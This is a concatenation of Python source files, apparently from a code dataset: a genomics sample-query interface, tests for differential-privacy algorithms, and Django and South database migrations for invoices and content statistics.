:returns: A SampleSet.
"""
pass
@property
@abc.abstractmethod
def sample_set(self) -> SampleSet:
"""
The set of selected samples :py:class:`genomics_data_index.storage.SampleSet` in this query.
:returns: A SampleSet defining the selected samples of this query.
"""
pass
@property
@abc.abstractmethod
def unknown_set(self) -> SampleSet:
"""
The set of samples :py:class:`genomics_data_index.storage.SampleSet` for which it is unknown
whether they match this query or not (e.g., due to missing/unknown data on a region of the genome).
:returns: A SampleSet defining the samples where it is unknown if they match the query or not.
"""
pass
@property
@abc.abstractmethod
def absent_set(self) -> SampleSet:
"""
The set of samples :py:class:`genomics_data_index.storage.SampleSet` for which the query does not match.
:returns: A SampleSet defining the samples where the query does not match.
"""
pass
@abc.abstractmethod
def join(self, data_frame: pd.DataFrame, sample_ids_column: str = None,
sample_names_column: str = None, default_isa_kind: str = 'names',
default_isa_column: str = None) -> SamplesQuery:
"""
Joins the passed dataframe onto the current query using the passed column name in the dataframe.
The column can either contain sample IDs (in sample_ids_column) or sample names (sample_names_column).
This will modify the universe set to the subset of samples found within the passed data frame.
:param data_frame: The data frame to join on.
:param sample_ids_column: The column name in the data frame containing internal sample IDs used for joining.
:param sample_names_column: The column name in the data frame containing sample names to join on.
Internally these will be mapped to Sample IDs.
:param default_isa_kind: The default 'kind' parameter to isa(data, kind=kind, ...) queries. This is used
to simplify queries after joining with a dataframe in cases where you want
isa() to select by a particular column in the dataframe.
:param default_isa_column: If default_isa_kind is set to 'dataframe' sets the default column to use for
isa() queries.
:return: A SamplesQuery representing the query joined with the data frame.
"""
pass
@abc.abstractmethod
def toframe(self, include_present: bool = True, include_unknown: bool = False,
include_absent: bool = False) -> pd.DataFrame:
"""
Converts the selected set of samples to a DataFrame with one row per sample. By default only samples selected
by this query will be returned (include_present = True). Setting include_absent to True will include all samples
where the current query is False, while include_unknown will return all samples where it is unknown if the
query is True or False (that is, it is unknown if these samples match the query).
:param include_present: Whether or not samples matching the query should be included.
:param include_unknown: Whether or not samples where it is unknown if they match the query or not should be included.
:param include_absent: Whether or not samples absent from this query (but in the universe of samples) should be
included.
:return: A DataFrame of the samples in this query, one row per sample. The 'Status' column of the dataframe
contains the status (Present, Absent, or Unknown) of the sample.
"""
pass
@abc.abstractmethod
def summary(self) -> pd.DataFrame:
"""
Summarizes the selected samples in a DataFrame. This includes the numbers present and absent in the selection
as well as percentages.
:return: A DataFrame summarizing the selected samples.
"""
pass
@abc.abstractmethod
def select_absent(self) -> SamplesQuery:
"""
Creates a new query with only the absent samples selected.
:return: A new query with only the absent samples selected.
"""
pass
@abc.abstractmethod
def select_present(self) -> SamplesQuery:
"""
Creates a new query with only the present samples selected (minus unknowns).
:return: A new query with only the present samples selected (minus unknowns).
"""
pass
@abc.abstractmethod
def select_unknown(self) -> SamplesQuery:
"""
Creates a new query with only the unknown samples selected.
:return: A new query with only the unknown samples selected.
"""
pass
@abc.abstractmethod
def features_summary(self, kind: str = 'mutations', selection: str = 'all',
include_present_features: bool = True, include_unknown_features: bool = False,
**kwargs) -> pd.DataFrame:
"""
Summarizes the selected features in a DataFrame. Please specify the kind of features with the kind parameter.
The `selection` parameter is used to define how to select features in the set of samples. If set to `unique`
then only those features unique to the selected samples will be returned. Otherwise, if set to `all` then all
features found in the selected samples are returned (even those that are also found in other samples in the universe).
For example, say you have a set of samples S = {A, B, C} and features F = {1:A:C, 2:G:T, 3:C:T}. Let's
also assume that sample A has {1:A:C, 2:G:T}, sample B has {2:G:T, 3:C:T} and sample C has {2:G:T}.
Also let's assume we have a query q = {A, B} (that is, a query that has selected the two samples A and B).
Then q.features_summary(selection='all') will return a data frame with features {1:A:C, 2:G:T, 3:C:T} (since
those are found in either sample A or B).
However, q.features_summary(selection='unique') will return a data frame with features {1:A:C, 3:C:T} since
these features are only found in samples A and B (the feature 2:G:T is also found in sample C).
:param kind: The kind of feature to summarize. By default this is *mutations*.
:param selection: The method used to select features. Use 'all' (default) to select all features present in
at least one of the selected samples in this query. Use 'unique' to select only those features
that are present in the selected samples of this query
(and nowhere else in the universe of samples).
:param include_present_features: Will determine if present (i.e., not unknown) features should be included.
:param include_unknown_features: Will determine if unknown features should be included.
:param **kwargs: Additional keyword arguments. Please see the documentation for the underlying implementation.
:return: A DataFrame summarizing the features within the selected samples.
"""
pass
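The 'all' versus 'unique' selection described in the features_summary() docstring can be sketched with plain Python sets, reusing the docstring's worked example. This is an illustration only; the real implementation queries indexed features, not dictionaries.

```python
# Sketch of features_summary() selection semantics using the docstring's
# worked example; plain sets stand in for the real feature index.
sample_features = {
    "A": {"1:A:C", "2:G:T"},
    "B": {"2:G:T", "3:C:T"},
    "C": {"2:G:T"},
}

def select_features(selected, selection="all"):
    # Features present in at least one selected sample.
    in_selection = set().union(*(sample_features[s] for s in selected))
    if selection == "all":
        return in_selection
    # 'unique': drop features also present in samples outside the selection.
    others = set(sample_features) - set(selected)
    in_others = set().union(*(sample_features[s] for s in others))
    return in_selection - in_others

print(sorted(select_features({"A", "B"}, "all")))     # ['1:A:C', '2:G:T', '3:C:T']
print(sorted(select_features({"A", "B"}, "unique")))  # ['1:A:C', '3:C:T']
```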
@abc.abstractmethod
def features_comparison(self, sample_categories: Union[List[SamplesQuery], List[SampleSet], str],
category_prefixes: List[str] = None,
categories_kind: str = 'samples',
kind: str = 'mutations',
unit: str = 'percent',
category_samples_threshold: int = None,
**kwargs) -> pd.DataFrame:
"""
Creates a dataframe which compares different categories of samples with each other with respect to features.
For example, if kind == 'mutations', unit == 'percent' and there are two sample_categories then
this will return a dataframe like:
| Mutation | Total | Category1_percent | Category2_percent | Category1_total | Category2_total |
| ref:100:A:T | 10 | 50% | 100% | 8 | 2 |
| ref:200:CT:C | 10 | 100% | 0% | 8 | 2 |
| ... | ... | ... | ... | 8 | 2 |
Here, "Category1_percent" is the percent of samples in Category1 that have this mutation/feature
(50% or 4 out of 8 samples in Category1). "Category2_percent" is the percent of samples in Category2 with the
feature (100% or 2 out of 2 samples in Category2).
"Category1_total" and "Category2_total" are the total samples in each category. "Total" is the total
samples in the overall query that form the universe from which we are defining "Category1" and "Category2".
Note: since categories are defined based on sample queries, there is no enforcement that categories are
mutually exclusive (that is, "Category1_total" + "Category2_total" will not always equal "Total"). This
is done on purpose in case the categories you wish to compare are not mutually exclusive.
:param sample_categories: The different categories to compare. Either specify as a list of SamplesQuery
objects, a list of SampleSet objects, or a string.
:param kind: The kind of features to compare.
:param categories_kind: The kind of category to use ("sample_set", or "dataframe").
:param category_prefixes: The prefixes to use for the different categories (defaults to 1, 2, 3, ...).
:param unit: The type of data to compare in each category (either 'percent', 'proportion', or 'count').
:param category_samples_threshold: A threshold on the number of samples in a category for it to be considered.
:param **kwargs: Additional keyword arguments. Please see the documentation for the underlying implementation.
:return: A dataframe comparing each category with respect to the differences in features.
"""
pass
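The per-category percent and total columns described in the features_comparison() docstring can be sketched as follows. The sample data and category names here are invented for illustration; the real implementation operates on indexed features rather than in-memory dictionaries.

```python
import pandas as pd

# Build a comparison frame like the one sketched in the docstring: one row per
# feature, with per-category percent and total columns. Data is invented.
sample_features = {
    "S1": {"ref:100:A:T"},
    "S2": {"ref:100:A:T", "ref:200:CT:C"},
    "S3": {"ref:200:CT:C"},
    "S4": set(),
}
categories = {"Category1": {"S1", "S2"}, "Category2": {"S3", "S4"}}

rows = []
for feature in sorted(set().union(*sample_features.values())):
    row = {"Mutation": feature, "Total": len(sample_features)}
    for name, members in categories.items():
        count = sum(feature in sample_features[s] for s in members)
        row[name + "_percent"] = 100.0 * count / len(members)
        row[name + "_total"] = len(members)
    rows.append(row)

comparison = pd.DataFrame(rows)
print(comparison)
```

Note that the "Total" column counts every sample in the overall query, so overlapping categories are allowed, as the docstring points out.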
@abc.abstractmethod
def tofeaturesset(self, kind: str = 'mutations', selection: str = 'all',
include_present_features: bool = True, include_unknown_features: bool = False) -> Set[str]:
"""
Returns all features as a set of strings for the selected samples.
:param kind: The kind of feature to summarize. By default this is *mutations*.
:param selection: The method used to select features. Use 'all' (default) to select all features.
Use 'unique' to select only those features unique to the selected samples.
:param include_present_features: Will determine if present (i.e., not unknown) features should be included.
:param include_unknown_features: Will determine if unknown features should be included.
:return: A set of feature identifiers derived from the selected samples.
"""
pass
@abc.abstractmethod
def intersect(self, sample_set: SampleSet, query_message: str = None) -> SamplesQuery:
"""
Intersects this SamplesQuery with the given :py:class:`genomics_data_index.storage.SampleSet`.
Appends the given *query_message* to the list of query messages.
:param sample_set: The :py:class:`genomics_data_index.storage.SampleSet` to intersect.
:param query_message: A message to include as part of the query messages.
:return: A new SamplesQuery which is the intersection of this query and the passed set.
"""
pass
@abc.abstractmethod
def and_(self, other: SamplesQuery) -> SamplesQuery:
"""
Performs an AND operation (intersection) on this query with another query.
That is if A and B are sample queries then C = A.and_(B) means that C consists of samples in the intersection
of A and B (C consists of samples that are in A AND B).
:param other: The other SamplesQuery to use.
:return: A new SamplesQuery which is the intersection of this query and the other query.
"""
pass
@abc.abstractmethod
def or_(self, other: SamplesQuery) -> SamplesQuery:
"""
Performs an OR operation (union) on this query with another query.
That is if A and B are sample queries then C = A.or_(B) means that C consists of samples in the union
of A and B (C consists of samples that are in A OR B).
:param other: The other SamplesQuery to use.
:return: A new SamplesQuery which is the union of this query and the other query.
"""
pass
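The and_/or_ operations described above are ordinary set intersection and union over sample identifiers. A minimal sketch with built-in sets (sample names invented):

```python
# A.and_(B) keeps samples in both queries; A.or_(B) keeps samples in either.
a = {"sampleA", "sampleB", "sampleC"}
b = {"sampleB", "sampleC", "sampleD"}

print(sorted(a & b))  # AND: ['sampleB', 'sampleC']
print(sorted(a | b))  # OR:  ['sampleA', 'sampleB', 'sampleC', 'sampleD']
```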
@abc.abstractmethod
def subsample(self, k: Union[int, float], include_unknown: bool = False, seed: int = None) -> SamplesQuery:
"""
Select a random subsample of genomic samples from this query.
:param k: If k >= 1, select this number of samples. If k < 1, select this proportion of samples
(e.g., 0.5 means select 50% of the samples in the query).
:param include_unknown: Whether unknown samples should be included in the subsample. If True,
then the value given by k will apply to both unknown and present samples.
:param seed: The seed for the random number generator (defaults to picking a random seed).
:return: A new SamplesQuery that selects a random subsample of the genomic samples in the current query.
"""
pass
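The count-versus-proportion interpretation of `k` in subsample() can be sketched like this (illustrative only; the actual implementation's rounding and sampling details may differ):

```python
import random

def subsample_size(n, k):
    # k >= 1: an absolute number of samples; k < 1: a proportion of the
    # n samples, mirroring the subsample() docstring above.
    return int(k) if k >= 1 else round(n * k)

def subsample(samples, k, seed=None):
    rng = random.Random(seed)  # a fixed seed makes the draw reproducible
    return rng.sample(sorted(samples), subsample_size(len(samples), k))

names = {"A", "B", "C", "D"}
print(subsample_size(len(names), 2))        # 2 samples requested outright
print(subsample_size(len(names), 0.5))      # 0.5 * 4 = 2 samples
print(len(subsample(names, 0.5, seed=42)))  # 2
```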
@abc.abstractmethod
def build_tree(self, kind: str, **kwargs) -> SamplesQuery:
"""
Builds a tree from the samples contained in this query using the passed *kind* of features.
:param kind: The *kind* of features to use.
:param **kwargs: See documentation for the underlying implementation.
:return: A new SamplesQuery which has a tree attached to it to be used for additional querying.
"""
pass
@abc.abstractmethod
def join_tree(self, tree: Tree, kind='mutation', **kwargs) -> SamplesQuery:
"""
Joins a tree to this SamplesQuery representing a tree defined by the passed *kind* of features.
:param tree: The tree to join to this query.
:param kind: The *kind* of features that were used to build the tree
(used to define what type of tree we are joining/the distance units).
:param **kwargs: See documentation for the underlying implementation.
:return: A new SamplesQuery which has the passed tree attached to it to be used for additional querying.
"""
pass
@abc.abstractmethod
def reset_universe(self, include_unknown: bool = True) -> SamplesQuery:
"""
Resets the *universe* set to be the set of currently selected samples.
That is, if `A` is a SamplesQuery consisting of some selected samples, then
`B = A.reset_universe()` implies that `B.universe_set == A`.
:param include_unknown: Whether or not unknown matches should be included in the universe.
:return: A SamplesQuery with the universe reset to whatever is selected.
"""
pass
@abc.abstractmethod
def set_universe(self, universe_set: SampleSet, query_message: str = None) -> SamplesQuery:
"""
Sets the *universe* set to be equal to the passed set. Will intersect any selected/unknown sample sets.
That is, if `A` is a SamplesQuery consisting of some selected samples and `U` is a universe of samples, then
`B = A.set_universe(U)` implies that: (1) `B.universe_set == U`, (2) `B.sample_set == A.sample_set.intersect(U)`,
(3) `B.unknown_set == A.unknown_set.intersect(U)`, and (4) `B.absent_set == A.absent_set.intersect(U)`.
:param universe_set: The new universe set.
:param query_message: An (optional) message to append to the query message string representing this operation.
:return: A SamplesQuery with the universe set to the passed set.
"""
pass
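The four intersection relationships listed in the set_universe() docstring can be checked with plain sets (sample names invented for illustration):

```python
universe = {"A", "B", "C"}  # the new universe U passed to set_universe()
selected, unknown, absent = {"A", "D"}, {"B"}, {"C", "E"}

# set_universe(U) intersects each component set with U:
new_selected = selected & universe  # B.sample_set
new_unknown = unknown & universe    # B.unknown_set
new_absent = absent & universe      # B.absent_set
print(new_selected, new_unknown, new_absent)
```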
@abc.abstractmethod
def hasa(self, property: Union[QueryFeature, str, pd.Series], kind='mutation') -> SamplesQuery:
"""
Queries for samples that have a (**hasa**) particular feature/property. That is if `A` is a SamplesQuery
and `m` is a mutation, then A.hasa(m) selects all those samples of A that have the mutation m.
:param property: The particular property/feature to query by. This can be either QueryFeature defining
the particular feature, a string defining the feature, or a pandas Series consisting of boolean values
which is the result of a DataFrame selection expression.
:param kind: The kind of *property* that was passed.
:return: A new SamplesQuery consisting of those samples that have the passed property.
"""
pass
def has(self, property: Union[QueryFeature, str, pd.Series], kind='mutation') -> SamplesQuery:
"""
Queries for samples that have a particular property. Synonym for hasa().
"""
return self.hasa(property=property, kind=kind)
@abc.abstractmethod
def complement(self):
"""
Returns the complement of the selected set of samples in the SamplesQuery.
That is if A is a SamplesQuery with U = A.universe_set, then B = A.complement() will result in a
SamplesQuery, B, consisting of all those samples in U not in A.
:return: The complement of this SamplesQuery.
"""
pass
def within(self, data: Union[str, List[str], SamplesQuery, SampleSet], **kwargs) -> SamplesQuery:
"""
Queries for samples within a particular distance. This is identical to calling
isin(data, kind='distance', ...). Used to help make code easier to read.
:param data: The data to use for selecting samples by (e.g., the samples being used to measure distance against).
:param **kwargs: Other arguments for the internal implementations.
:return: A SamplesQuery with the matched samples.
"""
return self.isin(data=data, kind='distance', **kwargs)
@abc.abstractmethod
def _within_distance(self, data: Union[str, List[str], SamplesQuery, SampleSet], distance: float, units: str,
**kwargs) -> SamplesQuery:
pass
@abc.abstractmethod
def _distance_units(self) -> List[str]:
pass
@abc.abstractmethod
def isa(self, data: Union[str, List[str], SamplesQuery, SampleSet], kind: Union[IsaKind, str] = 'sample',
**kwargs) -> SamplesQuery:
"""
Queries for samples which are a particular type/belong to a particular category.
Read as "subset samples which are a (isa) particular type defined by 'data'".
The default implementation will select samples by sample name but this type of query is also useful when used
with an attached dataframe (at which point it selects based on matches to a column,
see documentation for :py:class:`genomics_data_index.api.query.impl.DataFrameSamplesQuery`).
:param data: The data to match.
:param kind: The particular kind of data passed.
:param **kwargs: Arguments for the underlying implementation.
:return: A SamplesQuery with the matched samples.
"""
pass
def isan(self, data: Union[str, List[str], SamplesQuery, SampleSet], kind: str = None,
**kwargs) -> SamplesQuery:
"""
Synonym for isa().
"""
return self.isa(data=data, kind=kind, **kwargs)
@abc.abstractmethod
def isin(self, data: Union[str, List[str], pd.Series, SamplesQuery, SampleSet], kind: str = None,
**kwargs) -> SamplesQuery:
"""
Queries for samples which are in (isin) the passed data. This can have a number of interpretations
depending on the passed kind
1. If kind == 'sample' (or 'samples') then isin(['Name']) returns a set of samples with one of the passed names.
2. If kind == 'distance' (or 'distances') then isin(['Name']) returns a set of samples that are within
a particular distance of the passed samples.
:param data: The data to match. This could be a list of strings (representing sample names) or a SampleSet or
SamplesQuery representing a set of samples.
:param kind: The particular kind of data passed.
:param **kwargs: Arguments for the underlying implementation.
:return: A SamplesQuery with the matched samples.
"""
pass
@abc.abstractmethod
def _get_sample_names_query_infix_from_data(self, data: Union[str, List[str], pd.Series, SamplesQuery, SampleSet]
) -> Tuple[Set[str], str]:
pass
@abc.abstractmethod
def _can_handle_isin_kind(self, kind: str) -> bool:
pass
@abc.abstractmethod
def _can_handle_isa_kind(self, kind: str) -> bool:
pass
@abc.abstractmethod
def _isa_kinds(self) -> List[str]:
pass
@abc.abstractmethod
def _isin_kinds(self) -> List[str]:
pass
@abc.abstractmethod
def to_distances(self, kind: str, **kwargs) -> Tuple[np.ndarray, List[str]]:
"""
Returns a distance matrix representing the pairwise distances between all selected samples.
:param kind: The features kind used to generate the distance matrix (e.g., 'mutations' or 'kmer').
:param **kwargs: Additional arguments depending on the implementation.
:return: A Tuple consisting of a pairwise distance matrix (as a NumPy array) and a list of labels of the distance
matrix (sample names).
"""
pass
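The (matrix, labels) return shape described in the to_distances() docstring can be illustrated with a small Hamming-distance computation over toy binary feature vectors (invented data; real distances depend on the feature kind):

```python
import numpy as np

labels = ["sampleA", "sampleB", "sampleC"]
features = np.array([
    [1, 0, 1, 1],  # sampleA
    [1, 1, 1, 0],  # sampleB
    [0, 0, 1, 1],  # sampleC
])

# Pairwise Hamming distances via broadcasting: count differing positions
# between every pair of rows, giving a symmetric matrix with a zero diagonal.
matrix = (features[:, None, :] != features[None, :, :]).sum(axis=2)
print(matrix.shape)  # (3, 3)
print(matrix[0, 1])  # 2 positions differ between sampleA and sampleB
```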
@abc.abstractmethod
def _get_has_kinds(self) -> List[str]:
pass
@abc.abstractmethod
def is_empty(self, include_unknown=False) -> bool:
"""
Whether or not the selected set of samples is empty.
:param include_unknown: Whether or not to include samples with unknown status.
:return: True if the selected set of samples is empty, False otherwise.
"""
pass
@abc.abstractmethod
def query_expression(self) -> str:
"""
A string representing the series of queries performed to select the given samples in this SamplesQuery.
For example if A is a SamplesQuery then `A.query_expression() == "hasa('mutation') AND hasa('mutation2')"`
would mean that the SamplesQuery A represents samples that have both 'mutation' and 'mutation2'.
:return: A string representing the set of queries performed to generate this set.
"""
pass
@property
@abc.abstractmethod
def tree(self):
"""
If this SamplesQuery has a joined tree, then returns the tree.
:return: An ete3.Tree that has been joined to this SamplesQuery (or raises an exception if no tree).
"""
pass
@abc.abstractmethod
def has_tree(self) -> bool:
"""
Whether or not this SamplesQuery has a joined tree.
:return: True if this SamplesQuery has a joined tree, False otherwise.
"""
pass
@abc.abstractmethod
def tolist(self, names: bool = True, include_present: bool = True,
include_unknown: bool = False, include_absent: bool = False) -> Union[List[str], List[int]]:
"""
Converts the set of selected samples into a list of either sample names or sample IDs.
:param names: If True (default) return a list of sample names as strings, if False return a list of sample IDs.
:param include_present: If True (default) include selected samples.
:param include_unknown: If True, include unknown samples.
:param include_absent: If True, include absent samples from selection.
:return: A list of sample names or IDs.
"""
pass
@abc.abstractmethod
def toset(self, names: bool = True, include_present: bool = True,
include_unknown: bool = False, include_absent: bool = False) -> Union[Set[str], Set[int]]:
"""
Converts the set of selected samples into a set of either sample names or sample IDs.
:param names: If True (default) return a set of sample names as strings, if False return a set of sample IDs.
:param include_present: If True (default) include selected samples.
:param include_unknown: If True, include unknown samples.
:param include_absent: If True, include absent samples from selection.
:return: A set of sample names or IDs.
"""
pass
def __invert__(self):
"""
Performs an **~** (invert, complement) operation on a SamplesQuery object.
If A is a SamplesQuery object then `~A` is equivalent to `A.complement()`.
:return: The complement of a SamplesQuery object.
"""
return self.complement()
def __and__(self, other):
"""
Performs an **&** (and) operation (intersection) between two different SamplesQuery objects.
If A and B are two SamplesQuery objects then `A & B` is equivalent to `A.and_(B)`.
:return: The and (intersection) of two SamplesQuery objects.
"""
return self.and_(other)
def __or__(self, other):
"""
Performs an **|** (or) operation (union) between two different SamplesQuery objects.
If A and B are two SamplesQuery objects then `A | B` is equivalent to `A.or_(B)`.
:return: The or (union) of two SamplesQuery objects.
"""
return self.or_(other)
@abc.abstractmethod
def __len__(self):
"""
The number of selected samples.
:return: The number of selected samples.
"""
pass
| 47.180412 | 126 | 0.652136 | 3,642 | 27,459 | 4.858045 | 0.109006 | 0.039394 | 0.046346 | 0.043407 | 0.46346 | 0.391511 | 0.344769 | 0.287628 | 0.261064 | 0.2189 | 0 | 0.004162 | 0.273681 | 27,459 | 581 | 127 | 47.261618 | 0.882972 | 0.659784 | 0 | 0.546512 | 0 | 0 | 0.012848 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.27907 | false | 0.244186 | 0.052326 | 0 | 0.377907 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
7843f99fa555b9a42a97484361243439238612ae | 1,188 | py | Python | tests/test_algorithms.py | fossabot/StatDP | 91cf5a646acdd3b332979211d3b6db89dffe3153 | [
"MIT"
] | null | null | null | tests/test_algorithms.py | fossabot/StatDP | 91cf5a646acdd3b332979211d3b6db89dffe3153 | [
"MIT"
] | null | null | null | tests/test_algorithms.py | fossabot/StatDP | 91cf5a646acdd3b332979211d3b6db89dffe3153 | [
"MIT"
] | null | null | null | from statdp.algorithms import *
def test_noisymax():
# add no noise to the array
assert noisy_max_v1a([1, 2, 1], float('inf')) == 1
assert noisy_max_v1b([1, 3, 1], float('inf')) == 3
assert noisy_max_v2a([1, 3, 1], float('inf')) == 1
assert noisy_max_v2b([1, 3, 1], float('inf')) == 3
def test_sparsevector():
assert sparse_vector_lyu([1, 2, 3, 4], float('inf'), 1, 2.5) == 2
assert sparse_vector_1([1, 2, 3, 4], float('inf'), 1, 1.5) == 1
assert sparse_vector_1([1, 2, 3, 4], float('inf'), 1, 3.5) == 1
assert sparse_vector_2([1, 2, 3, 4], float('inf'), 1, 1.5) == 1
assert sparse_vector_2([1, 2, 3, 4], float('inf'), 1, 3.5) == 1
assert sparse_vector_3([1, 2, 3, 4], float('inf'), 1, 1.5) == 1
assert sparse_vector_3([1, 2, 3, 4], float('inf'), 1, 3.5) == 1
assert sparse_vector_4([1, 2, 3, 4], float('inf'), 1, 2) == 2
def test_histogram():
assert histogram([1, 2], float('inf')) == 1
assert isinstance(histogram([1, 2], 1), float)
assert histogram_eps([1, 2], 0) == 1
assert isinstance(histogram_eps([1, 2], 1), float)
def test_laplace_mechanism():
assert laplace_mechanism([1, 2, 3], float('inf')) == 1
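The tests above pass float('inf') as epsilon so the mechanisms add no noise and behave deterministically. A hedged sketch of a report-noisy-max variant shows why; the actual statdp implementations may differ in noise scale and tie-breaking:

```python
import math
import random

def noisy_max_index(queries, epsilon):
    """Report-noisy-max sketch: add Laplace(2/epsilon) noise to each query
    answer and return the index of the largest noisy answer. With
    epsilon == inf the noise scale is 0, so the true argmax index comes back,
    which is what the deterministic assertions above rely on."""
    scale = 0.0 if math.isinf(epsilon) else 2.0 / epsilon

    def laplace(b):
        # Inverse-CDF sampling of Laplace(0, b); b == 0 means no noise.
        if b == 0.0:
            return 0.0
        u = random.random() - 0.5
        return -b * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))

    noisy = [q + laplace(scale) for q in queries]
    return noisy.index(max(noisy))

print(noisy_max_index([1, 2, 1], float('inf')))  # 1
```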
| 37.125 | 69 | 0.588384 | 212 | 1,188 | 3.146226 | 0.174528 | 0.047976 | 0.161919 | 0.047976 | 0.494753 | 0.491754 | 0.455772 | 0.383808 | 0.341829 | 0.341829 | 0 | 0.112395 | 0.198653 | 1,188 | 31 | 70 | 38.322581 | 0.588235 | 0.021044 | 0 | 0 | 0 | 0 | 0.036176 | 0 | 0 | 0 | 0 | 0 | 0.772727 | 1 | 0.181818 | true | 0 | 0.045455 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7847a27238af0ef5906a293df2a1d3597c2a98b5 | 7,449 | py | Python | workbench/invoices/migrations/0001_initial.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 15 | 2020-09-02T22:17:34.000Z | 2022-02-01T20:09:10.000Z | workbench/invoices/migrations/0001_initial.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 18 | 2020-01-08T15:28:26.000Z | 2022-02-28T02:46:41.000Z | workbench/invoices/migrations/0001_initial.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 8 | 2020-09-29T08:00:24.000Z | 2022-01-16T11:58:19.000Z | # Generated by Django 2.1.7 on 2019-03-04 21:39
from decimal import Decimal
import django.core.validators
import django.db.models.deletion
import django.utils.timezone
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("contacts", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="Invoice",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"subtotal",
models.DecimalField(
decimal_places=2,
default=Decimal("0.00"),
max_digits=10,
validators=[django.core.validators.MinValueValidator(0)],
verbose_name="subtotal",
),
),
(
"discount",
models.DecimalField(
decimal_places=2,
default=Decimal("0.00"),
max_digits=10,
validators=[django.core.validators.MinValueValidator(0)],
verbose_name="discount",
),
),
(
"liable_to_vat",
models.BooleanField(
default=True,
help_text="For example invoices to foreign institutions are not liable to VAT.",
verbose_name="liable to VAT",
),
),
(
"tax_rate",
models.DecimalField(
decimal_places=2,
default=Decimal("7.7"),
max_digits=10,
validators=[django.core.validators.MinValueValidator(0)],
verbose_name="tax rate",
),
),
(
"total",
models.DecimalField(
decimal_places=2,
default=Decimal("0.00"),
max_digits=10,
validators=[django.core.validators.MinValueValidator(0)],
verbose_name="total",
),
),
(
"invoiced_on",
models.DateField(blank=True, null=True, verbose_name="invoiced on"),
),
(
"due_on",
models.DateField(blank=True, null=True, verbose_name="due on"),
),
(
"closed_on",
models.DateField(
blank=True,
help_text="Payment date for paid invoices, date of replacement or cancellation otherwise.",
null=True,
verbose_name="closed on",
),
),
("title", models.CharField(max_length=200, verbose_name="title")),
(
"description",
models.TextField(blank=True, verbose_name="description"),
),
(
"created_at",
models.DateTimeField(
default=django.utils.timezone.now, verbose_name="created at"
),
),
(
"status",
models.PositiveIntegerField(
choices=[
(10, "In preparation"),
(20, "Sent"),
(30, "Reminded"),
(40, "Paid"),
(50, "Canceled"),
(60, "Replaced"),
],
default=10,
verbose_name="status",
),
),
(
"type",
models.CharField(
choices=[
("fixed", "Fixed amount"),
("down-payment", "Down payment"),
("services", "Services"),
("credit", "Credit"),
],
max_length=20,
verbose_name="type",
),
),
(
"down_payment_total",
models.DecimalField(
decimal_places=2,
default=Decimal("0.00"),
max_digits=10,
validators=[django.core.validators.MinValueValidator(0)],
verbose_name="down payment total",
),
),
("postal_address", models.TextField(verbose_name="postal address")),
("_code", models.IntegerField(verbose_name="code")),
(
"payment_notice",
models.TextField(
blank=True,
help_text="This fields' value is overridden when processing credit entries.",
verbose_name="payment notice",
),
),
(
"contact",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="contacts.Person",
verbose_name="contact",
),
),
(
"customer",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
to="contacts.Organization",
verbose_name="customer",
),
),
(
"down_payment_applied_to",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="down_payment_invoices",
to="invoices.Invoice",
verbose_name="down payment applied to",
),
),
(
"owned_by",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
to=settings.AUTH_USER_MODEL,
verbose_name="contact person",
),
),
],
options={
"verbose_name": "invoice",
"verbose_name_plural": "invoices",
"ordering": ("-id",),
},
)
]
| 36.694581 | 115 | 0.369983 | 473 | 7,449 | 5.674419 | 0.310782 | 0.098361 | 0.044709 | 0.040984 | 0.358048 | 0.348361 | 0.348361 | 0.328614 | 0.328614 | 0.295082 | 0 | 0.02109 | 0.541683 | 7,449 | 202 | 116 | 36.876238 | 0.765085 | 0.006041 | 0 | 0.402062 | 1 | 0 | 0.123075 | 0.008781 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030928 | 0 | 0.051546 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
78733d61064ebbc703ac7b9326491f407ee90916 | 4,568 | py | Python | content_interactions_stats/migrations/0001_initial.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | content_interactions_stats/migrations/0001_initial.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | content_interactions_stats/migrations/0001_initial.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Stats'
db.create_table(u'content_interactions_stats_stats', (
